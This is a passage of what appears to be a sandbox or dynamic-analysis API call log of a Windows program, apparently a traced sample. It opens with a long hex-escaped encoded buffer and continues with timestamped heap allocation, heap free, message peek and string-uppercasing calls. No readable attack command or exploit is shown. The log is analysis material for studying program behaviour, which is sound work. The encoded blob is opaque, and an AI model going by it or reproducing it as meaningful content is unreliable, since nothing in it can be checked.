\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0266.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0266.991] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0266.991] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0266.991] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0266.991] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0266.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0266.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0266.991] CharUpperBuffW (in: lpsz="A4B00E03609", cchLength=0xb | out: lpsz="A4B00E03609") returned 0xb [0266.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0266.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17d8 [0266.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0266.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17f8 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0266.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0266.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0266.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0266.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0266.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0266.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0266.993] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0266.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0266.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0266.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0266.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0266.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0266.993] CharUpperBuffW (in: lpsz="SSA4B00E03609", cchLength=0xd | out: lpsz="SSA4B00E03609") returned 0xd [0266.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0266.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0266.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0266.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0266.994] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0266.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0266.994] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0266.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0266.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0266.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0266.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0266.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0266.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0266.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0266.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0266.995] PeekMessageW (in: lpMsg=0x8bf620, 